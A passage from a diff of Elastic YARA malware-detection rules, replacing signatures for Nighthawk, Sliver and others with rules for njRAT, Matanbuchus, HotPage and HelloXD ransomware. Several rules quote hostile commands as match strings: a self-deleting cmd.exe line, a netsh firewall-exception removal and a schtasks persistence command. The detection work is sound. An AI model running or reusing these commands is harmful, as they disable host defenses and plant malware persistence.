?? ?? ?? ?? 33 DB 48 8D 4E ?? 48 89 5C 24 ?? 45 33 C9 89 5C 24 ?? BA ?? ?? ?? ?? 4C 8B E0 89 5C 24 ?? 44 8D 43 ?? C7 44 24 ?? ?? ?? ?? ?? FF D7 48 8B F8 48 83 F8 ?? 74 ?? 8B 55 ?? 45 33 C9 45 33 C0 48 8B C8 } - $seq_crypto_op = { 40 84 F6 74 ?? 48 8B C2 B9 04 00 00 00 F3 0F 6F 44 05 ?? F3 0F 6F 4C 05 ?? 48 8D 40 ?? 66 0F EF C8 F3 0F 7F 4C 05 ?? 48 83 E9 01 } - $seq_byte_shift = { 48 83 C3 ?? 8D 4D ?? 48 03 CF 0F B6 41 ?? 0F B6 71 ?? C1 E6 08 0B F0 0F B6 41 ?? C1 E6 08 0B F0 0F B6 01 C1 E6 ?? 0B F0 41 3B 75 ?? 76 ?? B8 ?? ?? ?? ?? EB ?? } + $a1 = "get_Registry" ascii fullword + $a2 = "SEE_MASK_NOZONECHECKS" wide fullword + $a3 = "Download ERROR" wide fullword + $a4 = "cmd.exe /c ping 0 -n 2 & del \"" wide fullword + $a5 = "netsh firewall delete allowedprogram \"" wide fullword + $a6 = "[+] System : " wide fullword condition: - ($loader_build_iat0 and $loader_syscall_func) or (2 of ($seq*)) + 3 of them } -rule ELASTIC_Windows_Trojan_Nighthawk_2A2E3B9D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Njrat_Eb2698D2 : FILE MEMORY { meta: - description = "Detects Windows Trojan Nighthawk (Windows.Trojan.Nighthawk)" + description = "Detects Windows Trojan Njrat (Windows.Trojan.Njrat)" author = "Elastic Security" - id = "2a2e3b9d-e85f-43b6-9754-1aa7c9f6f978" - date = "2022-11-24" - modified = "2023-06-20" + id = "eb2698d2-c9fa-4b0b-900f-1c4c149cca4b" + date = "2023-05-04" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Nighthawk.yar#L28-L47" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf" - logic_hash = "c42605ebba900fafb4ec2d34d93bb7adb69e731ce151b82a95889dd0d738da00" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Njrat.yar#L26-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d537397bc41f0a1cb964fa7be6658add5fe58d929ac91500fc7770c116d49608" + logic_hash = "c32a641f2d639f56a8137b3e0d0be3261fba30084eeba9d1205974713413af9f" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "40912e8d6bd09754046598b1311080e0ec6e040cb1b9ca93003c6314725d4d45" + fingerprint = "8eedcdabf459de87e895b142cd1a1b8c0e403ad8ec6466bc6ca493dd5daa823b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -88818,29 +88959,28 @@ rule ELASTIC_Windows_Trojan_Nighthawk_2A2E3B9D : FILE MEMORY os = "windows" strings: - $payload_bytes1 = { 66 C1 E0 05 66 33 D0 66 C1 E2 0A 66 0B D1 0F B7 D2 8B CA 0F B7 C2 C1 E9 02 33 CA 66 D1 E8 D1 E9 33 CA C1 E9 02 33 CA C1 E2 0F 83 E1 01 } - $payload_bytes2 = { 48 8B D9 44 8B C2 41 C1 E0 0F 8B C2 F7 D0 48 8B F2 44 03 C0 41 8B C0 C1 E8 0C 41 33 C0 8D 04 80 8B C8 C1 E9 04 33 C8 44 69 C1 09 08 00 00 41 8B C0 C1 E8 10 44 33 C0 B8 85 1C A7 AA } + $a1 = { 24 65 66 65 39 65 61 64 63 2D 64 34 61 65 2D 34 62 39 65 2D 62 38 61 62 2D 37 65 34 37 66 38 64 62 36 61 63 39 } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Nighthawk_23489175 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Hotpage_414F235F : FILE MEMORY { meta: - description = "Detects Windows Trojan Nighthawk (Windows.Trojan.Nighthawk)" + description = "Detects Windows Trojan Hotpage (Windows.Trojan.HotPage)" author = "Elastic Security" - id = "23489175-ed41-4f43-ac85-b9ae3ffb55d9" - date = "2023-06-14" - modified = "2023-07-10" + id = "414f235f-5e16-449a-9ac5-556655c4418e" + date = "2024-07-18" + modified = "2024-07-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Nighthawk.yar#L49-L74" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "697742d5dd071add40b700022fd30424cb231ffde223d21bd83a44890e06762f" - logic_hash = "be41fc53f7098ca3cf718e8066a488196423ede993466c9a24ad2af387e03b24" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_HotPage.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b8464126b64c809b4ab47aa91c5f322ce2c0ae4fd668a43de738a5caa7567225" + logic_hash = "cfa0036b22a83a5396b3f9014511720071246a775053ad493791ebc1212400f2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3ff9fe5ef10afa328025a6abd509af788a9b1d5ef73a379e3767b2a4291566a3" + fingerprint = "6f590056d3f7bb9f743861e8d317ec589d8703353428dfcea9a6d2f61f266cdf" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -88848,34 +88988,34 @@ rule ELASTIC_Windows_Trojan_Nighthawk_23489175 : FILE MEMORY os = "windows" strings: - $pdb = "C:\\Users\\Peter\\Desktop\\dev\\implant\\CommsChannel\\x64\\Release-ReflectiveDLL\\Implant.x64.pdb" ascii fullword - $seq_str_decrypt = { 48 8B C3 48 83 7B ?? ?? 72 ?? 48 8B 03 0F BE 14 06 49 8B CF E8 ?? ?? ?? ?? 48 85 C0 74 ?? 49 2B C7 48 8D 0D ?? ?? ?? ?? 8A 0C 08 48 8B C3 48 83 7B ?? ?? 72 ?? 48 8B 03 88 0C 06 } - $seq_hvnc = { BA 06 01 00 00 41 B9 00 00 20 A0 41 B8 20 00 00 00 48 8B CE FF 15 } - $seq_pe_parsing = { 8B 44 24 ?? 48 6B C0 28 48 8B 4C 24 ?? 8B 44 01 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 03 C8 48 8B C1 48 89 44 24 ?? 8B 44 24 ?? 48 6B C0 28 48 8B 4C 24 ?? 8B 44 01 ?? 89 44 24 ?? EB ?? } - $seq_library_resolver = { 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 63 40 ?? 48 8B 4C 24 ?? 48 03 C8 48 8B C1 48 89 44 24 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 8B 4C 24 ?? 8B 84 01 ?? ?? ?? ?? 89 44 24 ?? 83 7C 24 ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? } - $seq_disk_info = { 4C 8B A3 B0 00 00 00 48 8B BB A8 00 00 00 49 3B FC 0F 84 ?? ?? ?? ?? 48 8D B3 D8 00 00 00 4C 8D B3 F0 00 00 00 4C 8D BB C0 00 00 00 45 33 ED } - $seq_keyname = { 8B 4B 08 C1 E1 08 0B 4B 04 C1 E1 10 41 B8 40 00 00 00 48 8D 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? } - $seq_tcptable = { 41 BF 02 00 00 00 41 3B FF 74 ?? 83 FF 17 41 8B C7 75 ?? B8 08 00 00 00 } + $SpcSpOpusInfo = { 30 48 A0 1A 80 18 6E 56 53 17 76 FE 7F 51 7F 51 7E DC 79 D1 62 80 67 09 96 50 51 6C 53 F8 } + $s1 = "\\Device\\KNewTableBaseIo" + $s2 = "Release\\DwAdsafeLoad.pdb" + $s3 = "RedDriver.pdb" + $s4 = "Release\\DwAdSafe.pdb" + $s5 = "[%s] Begin injecting Broser pid=[%d]" + $s6 = "[%s] ADDbrowser PID ->[%d]" condition: - (1 of ($pdb)) or (2 of ($seq*)) + $SpcSpOpusInfo or 2 of ($s*) } -rule ELASTIC_Linux_Trojan_Ebury_7B13E9B6 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2017_100011_21025F50 : FILE MEMORY CVE_2017_100011 { meta: - description = "Detects Linux Trojan Ebury (Linux.Trojan.Ebury)" + description = "Detects Linux Exploit Cve 2017 100011 (Linux.Exploit.CVE-2017-100011)" author = "Elastic Security" - id = "7b13e9b6-ce96-4bd3-8196-83420280bd1f" + id = "21025f50-93af-4ea7-bdcb-ab4e210b8ac6" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ebury.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "30d126ffc5b782236663c23734f1eef21e1cc929d549a37bba8e1e7b41321111" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2017_100011.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "32db88b2c964ce48e6d1397ca655075ea54ce298340af55ea890a2411a67d554" + logic_hash = "3ec54a7639ccfc019e01fa287f69a93af57087e2d67d0c8574a646afb9043db5" score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "a891724ce36e86637540f722bc13b44984771f709219976168f12fe782f08306" + quality = 73 + tags = "FILE, MEMORY, CVE-2017-100011" + fingerprint = "a50c81daf4f081d7ddf61d05ab64d8fada5c4d6cdf8d28eb30c689e868d905aa" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -88883,28 +89023,28 @@ rule ELASTIC_Linux_Trojan_Ebury_7B13E9B6 : FILE MEMORY os = "linux" strings: - $a = { 8B 44 24 10 4C 8B 54 24 18 4C 8B 5C 24 20 8B 5C 24 28 74 04 } + $a = { 5D 20 64 6F 6E 65 2C 20 6B 65 72 6E 65 6C 20 74 65 78 74 3A } condition: all of them } -rule ELASTIC_Windows_Trojan_Naplistener_E8F16920 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Matanbuchus_B521801B : FILE MEMORY { meta: - description = "Detects Windows Trojan Naplistener (Windows.Trojan.NapListener)" + description = "Detects Windows Trojan Matanbuchus (Windows.Trojan.Matanbuchus)" author = "Elastic Security" - id = "e8f16920-52ca-46b6-a945-1b919f975aae" - date = "2023-02-28" - modified = "2023-03-20" + id = "b521801b-5623-4bfe-9a9d-9e16afa63c63" + date = "2022-03-17" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_NapListener.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6e8c5bb2dfc90bca380c6f42af7458c8b8af40b7be95fab91e7c67b0dee664c4" - logic_hash = "6cb7b5051fab2b56f39b2805788b5b0838a095b41fcc623fe412b215736be5d4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Matanbuchus.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2" + logic_hash = "609a0941b118d737124a5cd9c98c007e21557a239cfa3cf97cd3b4348c934f03" score = 75 - quality = 75 + quality = 25 tags = "FILE, MEMORY" - fingerprint = "36689095792e7eb7fce23e7d390675a3554c8a5ba4356aaf9c2fa8986d3a0439" + fingerprint = "7792cffc82678bb05ba1aa315011317611eb0bf962665e0657a7db2ce95f81b4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -88912,30 +89052,31 @@ rule ELASTIC_Windows_Trojan_Naplistener_E8F16920 : FILE MEMORY os = "windows" strings: - $start_routine = { 02 28 08 00 00 0A 00 00 28 03 00 00 0A 0A 14 FE 06 04 00 00 06 73 04 00 00 0A 73 05 00 00 0A 0B 16 28 06 00 00 0A 00 07 06 6F 07 00 00 0A 00 00 2A } - $main_routine = { 6F 22 00 00 0A 13 0E 11 0D 1F 24 14 16 8D 16 00 00 01 14 6F 23 00 00 0A 13 0F 11 0F 14 6F 24 00 00 0A 13 10 11 0E 11 10 18 8D 01 00 00 01 } - $start_thread = { 00 28 03 00 00 0A 0A 14 FE 06 04 00 00 06 73 04 00 00 0A 73 05 00 00 0A 0B 16 28 06 00 00 0A 00 07 06 6F 07 00 00 0A 00 2A } + $a1 = "%PROCESSOR_ARCHITECTURE%" ascii fullword + $a2 = "%PROCESSOR_REVISION%\\" ascii fullword + $a3 = "%LOCALAPPDATA%\\" ascii fullword + $a4 = "\"C:\\Windows\\system32\\schtasks.exe\" /Create /SC MINUTE /MO 1 /TN" ascii fullword condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Naplistener_414180A7 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Matanbuchus_4Ce9Affb : FILE MEMORY { meta: - description = "Detects Windows Trojan Naplistener (Windows.Trojan.NapListener)" + description = "Detects Windows Trojan Matanbuchus (Windows.Trojan.Matanbuchus)" author = "Elastic Security" - id = "414180a7-ca8d-4cf8-a346-08c3e0e1ed8a" - date = "2023-02-28" - modified = "2023-03-20" + id = "4ce9affb-58ef-4d31-b1ff-5a1c52822a01" + date = "2022-03-17" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_NapListener.yar#L23-L46" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6e8c5bb2dfc90bca380c6f42af7458c8b8af40b7be95fab91e7c67b0dee664c4" - logic_hash = "52d3ddebdc1a8aa4bcb902273bd2d3b4f9b51f248d25e7ae1cc260a9550111f5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Matanbuchus.yar#L24-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2" + logic_hash = "16441eb4617b6b3cb1e7d600959a5cbfe15c72c00361b45551b7ef4c81f78462" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "460b21638f200bf909e9e47bc716acfcb323540fbaa9ea9d0196361696ffa294" + fingerprint = "61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -88943,64 +89084,57 @@ rule ELASTIC_Windows_Trojan_Naplistener_414180A7 : FILE MEMORY os = "windows" strings: - $a1 = "https://*:443/ews/MsExgHealthCheckd/" ascii wide - $a2 = "FillFromEncodedBytes" ascii wide - $a3 = "Exception caught" ascii wide - $a4 = "text/html; charset=utf-8" ascii wide - $a5 = ".Run" ascii wide - $a6 = "sdafwe3rwe23" ascii wide + $a1 = { F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Vulndriver_Arpot_09C714C5 : FILE +rule ELASTIC_Windows_Trojan_Matanbuchus_58A61Aaa : FILE MEMORY { meta: - description = "Name: aswArPot.sys, Version: 21.1.187.0" + description = "Detects Windows Trojan Matanbuchus (Windows.Trojan.Matanbuchus)" author = "Elastic Security" - id = "09c714c5-7639-44cf-990f-16ac0d42f8f9" - date = "2022-04-27" - modified = "2022-05-03" + id = "58a61aaa-51b2-47f2-ab32-2e639957b2d5" + date = "2022-03-17" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_ArPot.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1" - logic_hash = "e5f972ad9a31aefbd20237e6ea3dd19a025c2e3487fa080e9f9b8acf1e3f58e6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Matanbuchus.yar#L44-L62" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2" + logic_hash = "7226e2f61bd6f1cca15c1f3f8d8697cb277d1e214f756295ffda5bc16304cc49" score = 75 quality = 75 - tags = "FILE" - fingerprint = "7876556bbfd68903a38103ccd6e9ec8c4c9a89e7dfaada86b6633a8d7ec9b806" - threat_name = "Windows.VulnDriver.ArPot" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 61 00 73 00 77 00 41 00 72 00 50 00 6F 00 74 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x15][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\xbb][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x14][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x15][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x15][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xba][\x00-\x00]))/ + $a1 = { 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB ?? 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Trojan_Sliver_46525B49 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Matanbuchus_C7811Ccc : FILE MEMORY { meta: - description = "Detects Windows Trojan Sliver (Windows.Trojan.Sliver)" + description = "Detects Windows Trojan Matanbuchus (Windows.Trojan.Matanbuchus)" author = "Elastic Security" - id = "46525b49-f426-4ecb-9bd6-36752f0461e9" - date = "2023-05-09" - modified = "2023-06-13" + id = "c7811ccc-5d8d-4bc8-a630-ac3282bb207e" + date = "2022-03-17" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Sliver.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ecce5071c28940a1098aca3124b3f82e0630c4453f4f32e1b91576aac357ac9c" - logic_hash = "6e61d82b191a740882bcfeac2f2cf337e19ace7b05784ff041b6af2f79ed8809" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Matanbuchus.yar#L64-L82" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2" + logic_hash = "e65dc05f6d9289a42c05afdc4da0ce1c18c1129dd87688a277ece925e83d7ef1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "104382f222b754b3de423803ac7be1d6fbdd9cbd11c855774d1ecb1ee73cb6c0" + fingerprint = "05f209a24d9eb2be7fa50444d8271b6f147027291f55a352ac3af5e9b3207010" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -89008,29 +89142,28 @@ rule ELASTIC_Windows_Trojan_Sliver_46525B49 : FILE MEMORY os = "windows" strings: - $a1 = { B6 54 0C 48 0F B6 74 0C 38 31 D6 40 88 74 0C 38 48 FF C1 48 83 } - $a2 = { 42 18 4C 8B 4A 20 48 8B 52 28 48 39 D9 73 51 48 89 94 24 C0 00 } + $a1 = { 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB ?? 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55 10 77 ?? 72 ?? 8B 45 F8 3B 45 0C 73 ?? 6A 00 6A 08 8B 4D FC 51 8B 55 F8 52 E8 ?? ?? ?? ?? 6A 00 6A 08 52 50 E8 ?? ?? ?? ?? 8B C8 8B 45 14 8B 55 18 E8 ?? ?? ?? ?? 0F BE F0 6A 00 6A 01 8B 55 FC 52 8B 45 F8 50 E8 ?? ?? ?? ?? 8B 4D 08 0F BE 1C 01 33 DE 6A 00 6A 01 8B 55 FC 52 8B 45 F8 50 E8 ?? ?? ?? ?? 8B 4D 08 88 1C 01 E9 ?? ?? ?? ?? 5E 5B 8B E5 5D C2 14 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Sliver_C9Cae357 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Helloxd_0C50F01B : FILE MEMORY { meta: - description = "Detects Windows Trojan Sliver (Windows.Trojan.Sliver)" + description = "Detects Windows Ransomware Helloxd (Windows.Ransomware.Helloxd)" author = "Elastic Security" - id = "c9cae357-9270-4871-8fad-d9c43dcab644" - date = "2023-05-10" - modified = "2023-06-13" + id = "0c50f01b-5f3d-4112-9930-ca1150fc12fa" + date = "2022-06-14" + modified = "2022-07-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Sliver.yar#L22-L40" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "27210d8d6e16c492c2ee61a59d39c461312f5563221ad4a0917d4e93b699418e" - logic_hash = "fea862352981787055961b1171de9b69a9c13d246f434809c8f4416d5c49a0ff" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Helloxd.yar#L1-L26" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "435781ab608ff908123d9f4758132fa45d459956755d27027a52b8c9e61f9589" + logic_hash = "71e09fa1a00fa6f3688129ee2b2a8957b84f64ef51fcba5123a6a9df80a9c7e1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5366540c4a4f4a502b550f5397f3b53e3bc909cbc0cb82a2091cabb19bc135aa" + fingerprint = "462d8c231d608e28e66d810b811f9fdf82d0b3770d21267a4375669a26bbaafd" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -89038,116 +89171,122 @@ rule ELASTIC_Windows_Trojan_Sliver_C9Cae357 : FILE MEMORY os = "windows" strings: - $a1 = { B1 F9 3C 0A 68 0F B4 B5 B5 B5 21 B2 38 23 29 D8 6F 83 EC 68 51 8E } + $mutex = "With best wishes And good intentions..." + $ransomnote0 = ":: our TOX below >:)" + $ransomnote1 = "You can download TOX here" + $ransomnote2 = "...!XD ::" + $productname = "HelloXD" ascii wide + $legalcopyright = "uKn0w" ascii wide + $description = "VhlamAV" ascii wide + $companyname = "MicloZ0ft" ascii wide condition: - all of them + ($mutex and all of ($ransomnote*)) or (3 of ($productname,$legalcopyright,$description,$companyname)) } -rule ELASTIC_Windows_Trojan_Sliver_1Dd6D9C2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Backconnect_C6803B39 : FILE MEMORY { meta: - description = "Detects Windows Trojan Sliver (Windows.Trojan.Sliver)" + description = "Detects Linux Trojan Backconnect (Linux.Trojan.Backconnect)" author = "Elastic Security" - id = "1dd6d9c2-026e-4140-b804-b56e07c72ac2" - date = "2023-05-10" - modified = "2023-06-13" + id = "c6803b39-e2e0-4ab8-9ead-e53eab26bb53" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Sliver.yar#L42-L61" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dc508a3e9ea093200acfc1ceebebb2b56686f4764fd8c94ab8c58eec7ee85c8b" - logic_hash = "5ef70322a6ee3dec609d2881b7624d25bc0297a2e6f43ac60834745e6a258cf3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Backconnect.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a5e6b084cdabe9a4557b5ff8b2313db6c3bb4ba424d107474024030115eeaa0f" + logic_hash = "02750b2788c2912bba0fc8594f6a12c75ce1f41d1075acf7c920f6e616ab65c7" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "fb676adf8b9d10d1e151bfb2a6a7e132cff4e55c20f454201a4ece492902fc35" + fingerprint = "1dfb097c90b0cf008dc9d3ae624e08504755222f68ee23ed98d0fa8803cff91a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { B7 11 49 89 DB C1 EB 10 41 01 DA 66 45 89 11 4C 89 DB EB B6 4D 8D } - $a2 = { 36 2E 33 20 62 75 69 6C 48 39 } + $a = { 78 3A 48 98 48 01 C3 49 01 C5 48 83 FB 33 76 DC 31 C9 BA 10 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Snessik_D166F98C : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Blackmatter_B548D151 : FILE MEMORY { meta: - description = "Detects Linux Trojan Snessik (Linux.Trojan.Snessik)" + description = "Detects Windows Ransomware Blackmatter (Windows.Ransomware.Blackmatter)" author = "Elastic Security" - id = "d166f98c-0fa3-4a1b-a6d2-7fbe4e338fc7" - date = "2021-01-12" - modified = "2021-09-16" + id = "b548d151-5dde-459b-9d4a-b4a48c1b5545" + date = "2021-08-03" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Snessik.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3ececc2edfff2f92d80ed3a5140af55b6bebf7cae8642a0d46843162eeddddd" - logic_hash = "44f15a87d48338aafa408d4bcabef844c8864cd95640ad99208b5035e28ccd27" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Blackmatter.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "072158f5588440e6c94cb419ae06a27cf584afe3b0cb09c28eff0b4662c15486" + logic_hash = "cf76a311de9d292a2ea09b3937b8eb7fd761b7c33a464a31acf6b9a5bf121959" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6247d59326ea71426862e1b242c7354ee369fbe6ea766e40736e2f5a6410c8d7" + fingerprint = "351658f8fe3f9c956634e3cf7a03b272c55359f069c5200e948d817c6b554c87" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D2 74 3B 83 CA FF F0 0F C1 57 10 85 D2 7F 9F 48 